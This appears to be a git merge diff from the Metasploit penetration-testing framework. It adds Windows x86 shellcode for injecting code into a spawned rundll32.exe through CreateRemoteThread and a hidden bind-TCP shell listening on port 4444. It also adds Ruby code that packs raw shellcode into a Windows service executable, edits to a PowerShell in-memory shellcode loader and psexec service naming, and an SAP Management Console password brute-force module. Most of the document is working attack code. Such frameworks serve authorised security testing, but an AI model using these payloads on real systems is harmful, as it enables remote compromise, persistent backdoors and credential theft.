Merge branch 'master' into staging/electro-release
commit
482aa2ea08
|
@ -11,7 +11,7 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
|
|||
|
||||
%{shellcode}
|
||||
|
||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
|
||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
|
||||
|
||||
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
|
||||
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
||||
|
|
82
external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
vendored
Normal file
82
external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
vendored
Normal file
|
@ -0,0 +1,82 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Size: 307 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
|
||||
xor edi, edi
|
||||
push 0x00000004 ;PAGE_READWRITE
|
||||
push 0x00001000 ;MEM_COMMIT
|
||||
push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION
|
||||
push edi
|
||||
push 0xE553A458 ;call VirtualAlloc()
|
||||
call ebp
|
||||
|
||||
mov dword [eax], 0x44
|
||||
lea esi, [eax+0x44]
|
||||
push edi
|
||||
push 0x6578652e
|
||||
push 0x32336c6c
|
||||
push 0x646e7572
|
||||
mov ecx, esp ;"rundll32.exe"
|
||||
push esi ;lpProcessInformation
|
||||
push eax ;lpStartupInfo
|
||||
push edi ;lpCurrentDirectory
|
||||
push edi ;lpEnvironment
|
||||
push 0x00000044 ;dwCreationFlags
|
||||
push edi ;bInheritHandles
|
||||
push edi ;lpThreadAttributes
|
||||
push edi ;lpProcessAttributes
|
||||
push ecx ;lpCommandLine
|
||||
push edi ;lpApplicationName
|
||||
push 0x863FCC79
|
||||
call ebp ;call CreatProcessA()
|
||||
|
||||
mov ecx, [esi]
|
||||
push 0x00000040 ;PAGE_EXECUTE_READWRITE
|
||||
push 0x00001000 ;MEM_COMMIT
|
||||
push 0x00001000 ;Next Shellcode Size
|
||||
push edi
|
||||
push ecx ;hProcess
|
||||
push 0x3F9287AE ;call VirtualAllocEx()
|
||||
call ebp
|
||||
|
||||
call me2
|
||||
me2:
|
||||
pop edx
|
||||
|
||||
mov edi, eax
|
||||
mov ecx, [esi]
|
||||
add dword edx, 0x112247 ;pointer on the next shellcode
|
||||
push esp
|
||||
push 0x00001000 ;Next Shellcode Size
|
||||
push edx ;
|
||||
push eax ;lBaseAddress
|
||||
push ecx ;hProcess
|
||||
push 0xE7BDD8C5
|
||||
call ebp ;call WriteProcessMemory()
|
||||
|
||||
xor eax, eax
|
||||
mov ecx, [esi]
|
||||
push eax ;lpThreadId
|
||||
push eax ;dwCreationFlags
|
||||
push eax ;lpParameter
|
||||
push edi ;lpStartAddress
|
||||
push eax ;dwStackSize
|
||||
push eax ;lpThreadAttributes
|
||||
push ecx ;hProcess
|
||||
push 0x799AACC6
|
||||
call ebp ;call CreateRemoteThread()
|
||||
|
||||
mov ecx, [esi]
|
||||
push ecx
|
||||
push 0x528796C6
|
||||
call ebp ;call CloseHandle()
|
||||
|
||||
mov ecx, [esi+0x4]
|
||||
push ecx
|
||||
push 0x528796C6
|
||||
call ebp ;call CloseHandle()
|
|
@ -0,0 +1,91 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com)
|
||||
; Modified version to add Hidden ACL support: Borja Merino (bmerinofe@gmail.com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (February 2014)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the newly connected clients socket
|
||||
; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
bind_tcp:
|
||||
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 0x5F327377 ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
|
||||
|
||||
xor ebx, ebx ; Clear EBX
|
||||
push ebx ; bind to 0.0.0.0
|
||||
push 0x5C110002 ; family AF_INET and port 4444
|
||||
mov esi, esp ; save a pointer to sockaddr_in struct
|
||||
push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
|
||||
push esi ; pointer to the sockaddr_in struct
|
||||
push edi ; socket
|
||||
push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
|
||||
call ebp ; bind( s, &sockaddr_in, 16 );
|
||||
|
||||
; Hidden ACL Support ----------
|
||||
|
||||
push 0x1 ; size, in bytes, of the buffer pointed to by the "optval" parameter
|
||||
push esp ; optval: pointer to the buffer in which the value for the requested option is specified
|
||||
push 0x3002 ; level at which the option is defined: SOL_SOCKET
|
||||
push 0xFFFF ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT
|
||||
push edi ; socket descriptor
|
||||
push 0x2977A2F1 ; hash( "ws2_32.dll", "setsockopt" )
|
||||
call ebp ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 );
|
||||
|
||||
push ebx ; backlog
|
||||
push edi ; socket
|
||||
push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
|
||||
call ebp ; listen( s, 0 );
|
||||
|
||||
condition:
|
||||
push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function)
|
||||
call wsaaccept ; push the start of the condition function on the stack
|
||||
mov eax, DWORD [esp+4] ;
|
||||
mov eax, DWORD [eax+4] ;
|
||||
mov eax, DWORD [eax+4] ; get the client IP returned in the stack
|
||||
sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed
|
||||
jz return ; if equal returns CF_ACCEPT
|
||||
xor eax, eax ; If not equal, the condition function returns CF_REJECT
|
||||
inc eax
|
||||
return:
|
||||
retn 0x20 ; some stack alignment needed to return to mswsock
|
||||
|
||||
wsaaccept:
|
||||
push ebx ; length of the sockaddr = nul
|
||||
push ebx ; struct sockaddr = nul
|
||||
push edi ; socket descriptor
|
||||
push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" )
|
||||
call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0)
|
||||
inc eax
|
||||
jz condition ; if error (eax = -1) jump to condition function to wait for another connection
|
||||
dec eax
|
||||
|
||||
push edi ; push the listening socket to close
|
||||
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
|
||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||
call ebp ; closesocket( s );
|
||||
|
|
@ -0,0 +1,64 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Size: 448 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
|
||||
push byte 0x0
|
||||
push 0x32336970
|
||||
push 0x61766461
|
||||
push esp
|
||||
push 0x726774c
|
||||
call ebp ;load advapi32.dll
|
||||
push 0x00454349
|
||||
push 0x56524553
|
||||
mov ecx, esp ;ServiceTableEntry.SVCNAME
|
||||
lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
|
||||
push 0x00000000
|
||||
push eax
|
||||
push ecx
|
||||
mov eax,esp
|
||||
push 0x00000000
|
||||
push eax
|
||||
push 0xCB72F7FA
|
||||
call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
|
||||
push 0x00000000
|
||||
push 0x56A2B5F0
|
||||
call ebp ;call ExitProcess(0)
|
||||
pop eax ;SvcCtrlHandler
|
||||
pop eax
|
||||
pop eax
|
||||
pop eax
|
||||
xor eax,eax
|
||||
ret
|
||||
cld ;SvcMain
|
||||
call me
|
||||
me:
|
||||
pop ebp
|
||||
sub ebp, 0xd6 ;ebp => hashFunction
|
||||
push 0x00464349
|
||||
push 0x56524553
|
||||
mov ecx, esp ;SVCNAME
|
||||
lea eax, [ebp+0xc9];SvcCtrlHandler
|
||||
push 0x00000000
|
||||
push eax
|
||||
push ecx
|
||||
push 0x5244AA0B
|
||||
call ebp ;RegisterServiceCtrlHandlerExA
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000004
|
||||
push 0x00000010
|
||||
mov ecx, esp
|
||||
push 0x00000000
|
||||
push ecx
|
||||
push eax
|
||||
push 0x7D3755C6
|
||||
call ebp ;SetServiceStatus RUNNING
|
41
external/source/shellcode/windows/x86/src/block/block_service_change_description.asm
vendored
Normal file
41
external/source/shellcode/windows/x86/src/block/block_service_change_description.asm
vendored
Normal file
|
@ -0,0 +1,41 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Size: 448 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
|
||||
push 0x000F003F
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x7636F067
|
||||
call ebp ;OpenSCManagerA
|
||||
mov edi, eax
|
||||
push 0x00464349
|
||||
push 0x56524553
|
||||
mov ecx, esp ;SVCNAME
|
||||
push 0x000F01FF
|
||||
push ecx
|
||||
push eax
|
||||
push 0x404B2856
|
||||
call ebp ;OpenServiceA
|
||||
mov esi, eax
|
||||
push 0x00464349
|
||||
push 0x56524553
|
||||
mov ecx, esp
|
||||
push 0x00000000
|
||||
push ecx
|
||||
mov ecx, esp ;SVCDESCRIPTION
|
||||
push ecx
|
||||
push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION
|
||||
push eax
|
||||
push 0xED35B087
|
||||
call ebp ;ChangeServiceConfig2A
|
||||
push esi
|
||||
push 0xAD77EADE ;CloseServiceHandle
|
||||
call ebp
|
||||
push edi
|
||||
push 0xAD77EADE ;CloseServiceHandle
|
||||
call ebp
|
|
@ -0,0 +1,45 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Size: 448 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
|
||||
call me3
|
||||
me3:
|
||||
pop edi
|
||||
jmp 0x7
|
||||
pop eax
|
||||
pop eax
|
||||
pop eax
|
||||
pop eax
|
||||
xor eax,eax
|
||||
ret
|
||||
push 0x00464349
|
||||
push 0x56524553
|
||||
mov ecx, esp ;SVCNAME
|
||||
lea eax, [edi+0x3];SvcCtrlHandler
|
||||
push 0x00000000
|
||||
push eax
|
||||
push ecx
|
||||
push 0x5244AA0B
|
||||
call ebp ;RegisterServiceCtrlHandlerExA
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000001
|
||||
push 0x00000010
|
||||
mov ecx, esp
|
||||
push 0x00000000
|
||||
push ecx
|
||||
push eax
|
||||
push 0x7D3755C6
|
||||
call ebp ;SetServiceStatus RUNNING
|
||||
push 0x0
|
||||
push 0x56a2b5f0
|
||||
call ebp ;ExitProcess
|
16
external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
vendored
Normal file
16
external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
vendored
Normal file
|
@ -0,0 +1,16 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Size: 307 bytes
|
||||
; Build: >build.py single_create_remote_process
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_create_remote_process.asm"
|
|
@ -0,0 +1,23 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Size: 448 bytes
|
||||
; Build: >build.py single_service_stuff
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_service.asm"
|
||||
%include "./src/block/block_service_change_description.asm"
|
||||
%include "./src/block/block_create_remote_process.asm"
|
||||
%include "./src/block/block_service_stopped.asm"
|
||||
|
||||
push edi
|
||||
push 0x56A2B5F0
|
||||
call ebp ;call ExitProcess(0)
|
20
external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm
vendored
Normal file
20
external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm
vendored
Normal file
|
@ -0,0 +1,20 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 341 bytes
|
||||
; Build: >build.py single_shell_bind_tcp
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_hidden_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be out socket.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
|
@ -51,8 +51,11 @@ module Exploit::Remote::SMB::Psexec
|
|||
# instead of all the ghetto "rescue ::Exception" madness
|
||||
# @param command [String] Should be a valid windows command
|
||||
# @param disconnect [Boolean] Disconnect afterwards
|
||||
# @param service_description [String] Service Description
|
||||
# @param service_name [String] Service Name
|
||||
# @param display_name [Strnig] Display Name
|
||||
# @return [Boolean] Whether everything went well
|
||||
def psexec(command, disconnect=true, service_description=nil)
|
||||
def psexec(command, disconnect=true, service_description=nil, service_name=nil, display_name=nil)
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
|
||||
handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
|
||||
vprint_status("#{peer} - Binding to #{handle} ...")
|
||||
|
@ -70,8 +73,8 @@ module Exploit::Remote::SMB::Psexec
|
|||
print_error("#{peer} - Error getting scm handle: #{e}")
|
||||
return false
|
||||
end
|
||||
servicename = Rex::Text.rand_text_alpha(11)
|
||||
displayname = Rex::Text.rand_text_alpha(16)
|
||||
servicename = service_name || Rex::Text.rand_text_alpha(11)
|
||||
displayname = display_name || Rex::Text.rand_text_alpha(16)
|
||||
|
||||
svc_handle = nil
|
||||
svc_status = nil
|
||||
|
|
|
@ -299,7 +299,6 @@ require 'msf/core/exe/segment_injector'
|
|||
end
|
||||
|
||||
def self.to_winpe_only(framework, code, opts={}, arch="x86")
|
||||
|
||||
if arch == ARCH_X86_64
|
||||
arch = ARCH_X64
|
||||
end
|
||||
|
@ -314,26 +313,56 @@ require 'msf/core/exe/segment_injector'
|
|||
exe = fd.read(fd.stat.size)
|
||||
}
|
||||
|
||||
pe_header_size = 0x18
|
||||
entryPoint_offset = 0x28
|
||||
section_size = 0x28
|
||||
characteristics_offset = 0x24
|
||||
virtualAddress_offset = 0x0c
|
||||
sizeOfRawData_offset = 0x10
|
||||
|
||||
sections_table_offset =
|
||||
pe._dos_header.v['e_lfanew'] +
|
||||
pe._file_header.v['SizeOfOptionalHeader'] +
|
||||
pe_header_size
|
||||
|
||||
sections_table_characteristics_offset = sections_table_offset + characteristics_offset
|
||||
|
||||
sections_header = []
|
||||
pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] }
|
||||
pe._file_header.v['NumberOfSections'].times { |i|
|
||||
section_offset = sections_table_offset + (i * section_size)
|
||||
sections_header << [
|
||||
sections_table_characteristics_offset + (i * section_size),
|
||||
exe[section_offset,section_size]
|
||||
]
|
||||
}
|
||||
|
||||
addressOfEntryPoint = pe.hdr.opt.AddressOfEntryPoint
|
||||
|
||||
#look for section with entry point
|
||||
# look for section with entry point
|
||||
sections_header.each do |sec|
|
||||
virtualAddress = sec[1][0xc,0x4].unpack('L')[0]
|
||||
sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0]
|
||||
characteristics = sec[1][0x24,0x4].unpack('L')[0]
|
||||
if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
|
||||
#put this section writable
|
||||
characteristics|=0x80000000
|
||||
virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
|
||||
sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
|
||||
characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
|
||||
|
||||
if (virtualAddress...virtualAddress+sizeOfRawData).include?(addressOfEntryPoint)
|
||||
importsTable = pe.hdr.opt.DataDirectory[8..(8+4)].unpack('L')[0]
|
||||
if (importsTable - addressOfEntryPoint) < code.length
|
||||
#shift original entry point to prevent tables overwritting
|
||||
addressOfEntryPoint = importsTable - (code.length + 4)
|
||||
|
||||
entry_point_offset = pe._dos_header.v['e_lfanew'] + entryPoint_offset
|
||||
exe[entry_point_offset,4] = [addressOfEntryPoint].pack('L')
|
||||
end
|
||||
# put this section writable
|
||||
characteristics |= 0x8000_0000
|
||||
newcharacteristics = [characteristics].pack('L')
|
||||
exe[sec[0],newcharacteristics.length]=newcharacteristics
|
||||
exe[sec[0],newcharacteristics.length] = newcharacteristics
|
||||
end
|
||||
end
|
||||
|
||||
#put the shellcode at the entry point, overwriting template
|
||||
exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code
|
||||
|
||||
# put the shellcode at the entry point, overwriting template
|
||||
entryPoint_file_offset = pe.rva_to_file_offset(addressOfEntryPoint)
|
||||
exe[entryPoint_file_offset,code.length] = code
|
||||
return exe
|
||||
end
|
||||
|
||||
|
@ -383,6 +412,33 @@ require 'msf/core/exe/segment_injector'
|
|||
return pe
|
||||
end
|
||||
|
||||
|
||||
# Splits a string into a number of assembly push operations
|
||||
#
|
||||
# @param string [String] string to be used
|
||||
#
|
||||
# @return [String] null terminated string as assembly push ops
|
||||
def self.string_to_pushes(string)
|
||||
str = string.dup
|
||||
# Align string to 4 bytes
|
||||
rem = (str.length) % 4
|
||||
if (rem > 0)
|
||||
str << "\x00" * (4 - rem)
|
||||
pushes = ''
|
||||
else
|
||||
pushes = "h\x00\x00\x00\x00"
|
||||
end
|
||||
# string is now 4 bytes aligned with null byte
|
||||
|
||||
# push string to stack, starting at the back
|
||||
while (str.length > 0)
|
||||
four = 'h'+str.slice!(-4,4)
|
||||
pushes << four
|
||||
end
|
||||
|
||||
pushes
|
||||
end
|
||||
|
||||
def self.exe_sub_method(code,opts ={})
|
||||
|
||||
pe = ''
|
||||
|
@ -462,11 +518,82 @@ require 'msf/core/exe/segment_injector'
|
|||
exe_sub_method(code,opts)
|
||||
end
|
||||
|
||||
# Embeds shellcode within a Windows PE file implementing the Windows
|
||||
# service control methods.
|
||||
#
|
||||
# @param framework [Object]
|
||||
# @param code [String] shellcode to be embedded
|
||||
# @option opts [Boolean] :sub_method use substitution technique with a
|
||||
# service template PE
|
||||
# @option opts [String] :servicename name of the service, not used in
|
||||
# substituion technique
|
||||
#
|
||||
# @return [String] Windows Service PE file
|
||||
def self.to_win32pe_service(framework, code, opts={})
|
||||
if opts[:sub_method]
|
||||
# Allow the user to specify their own service EXE template
|
||||
set_template_default(opts, "template_x86_windows_svc.exe")
|
||||
opts[:exe_type] = :service_exe
|
||||
exe_sub_method(code,opts)
|
||||
return exe_sub_method(code,opts)
|
||||
else
|
||||
name = opts[:servicename]
|
||||
name ||= Rex::Text.rand_text_alpha(8)
|
||||
pushed_service_name = string_to_pushes(name)
|
||||
|
||||
precode_size = 0xc6
|
||||
svcmain_code_offset = precode_size + pushed_service_name.length
|
||||
|
||||
precode_size = 0xcc
|
||||
hash_code_offset = precode_size + pushed_service_name.length
|
||||
|
||||
precode_size = 0xbf
|
||||
svcctrlhandler_code_offset = precode_size + pushed_service_name.length
|
||||
|
||||
code_service_stopped =
|
||||
"\xE8\x00\x00\x00\x00\x5F\xEB\x07\x58\x58\x58\x58\x31\xC0\xC3" +
|
||||
pushed_service_name+"\x89\xE1\x8D\x47\x03\x6A\x00" +
|
||||
"\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5\x6A\x00\x6A\x00\x6A\x00\x6A" +
|
||||
"\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
|
||||
"\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
|
||||
|
||||
precode_size = 0x42
|
||||
shellcode_code_offset = code_service_stopped.length + precode_size
|
||||
|
||||
# code_service could be encoded in the future
|
||||
code_service =
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
|
||||
"\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" +
|
||||
"\x8D\x85"+[svcmain_code_offset].pack('<I')+"\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
|
||||
"\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
|
||||
"\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED" +
|
||||
[hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
|
||||
"\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
|
||||
"\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
|
||||
"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
|
||||
"\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
|
||||
"\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
|
||||
"\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
|
||||
"\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
|
||||
"\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack('<I')+"\x57\x51\x68\xAE\x87" +
|
||||
"\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x81\xC2" +
|
||||
[shellcode_code_offset].pack('<I')+"\x54\x68"+[code.length].pack('<I') +
|
||||
"\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
|
||||
"\xD5\x31\xC0\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A" +
|
||||
"\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +
|
||||
"\x51\x68\xC6\x96\x87\x52\xFF\xD5" +
|
||||
code_service_stopped
|
||||
|
||||
return to_winpe_only(framework, code_service + code, opts)
|
||||
end
|
||||
end
|
||||
|
||||
def self.to_win64pe_service(framework, code, opts={})
|
||||
|
|
|
@ -16,13 +16,10 @@ class Metasploit4 < Msf::Auxiliary
|
|||
super(
|
||||
'Name' => 'SAP Management Console Brute Force',
|
||||
'Description' => %q{
|
||||
This module simply attempts to brute force the username |
|
||||
password for the SAP Management Console SOAP Interface. By
|
||||
setting the SAP SID value, a list of default SAP users can be
|
||||
tested without needing to set a USERNAME or USER_FILE value.
|
||||
The default usernames are stored in
|
||||
./data/wordlists/sap_common.txt (the value of SAP SID is
|
||||
automatically inserted into the username to replce <SAPSID>).
|
||||
This module simply attempts to brute force the username and
|
||||
password for the SAP Management Console SOAP Interface. If
|
||||
the SAP_SID value is set it will replace instances of <SAPSID>
|
||||
in any user/pass from any wordlist.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
|
@ -36,49 +33,43 @@ class Metasploit4 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(50013),
|
||||
OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', '']),
|
||||
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
|
||||
OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
|
||||
OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
|
||||
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
|
||||
File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
|
||||
], self.class)
|
||||
register_autofilter_ports([ 50013 ])
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
def run_host(rhost)
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'uri' => uri,
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
})
|
||||
|
||||
if not res
|
||||
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
|
||||
print_error("#{peer} [SAP] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if datastore['SAP_SID'] != ''
|
||||
if !datastore['USER_FILE'].nil?
|
||||
